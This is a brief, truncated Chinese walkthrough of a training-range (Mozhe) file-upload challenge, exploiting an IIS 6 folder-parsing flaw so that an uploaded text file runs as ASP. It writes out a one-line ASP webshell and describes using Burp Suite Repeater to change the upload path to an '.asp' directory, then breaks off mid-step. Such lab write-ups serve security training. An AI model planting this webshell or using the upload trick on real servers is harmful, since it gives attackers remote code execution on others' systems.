在線靶場-墨者-文件上傳1星-內部文件上傳系統漏洞分析溯源

點擊靶場網頁,提示我們要上傳一個文件,ii6有一個漏洞,在asp的文件夾下的txt也會被當做asp文件運行。所以我們先上傳一個文本寫入一句話木馬<%eval request (「pass」)%>(pass可以根據自己喜好更改)。然後開啓瀏覽器代理,運行burp suite,捕抓上傳文件的數據包,抓到包後,把數據包send to Repeater。更改上傳的路徑將upload更改爲asd.asp(x
相關文章
相關標籤/搜索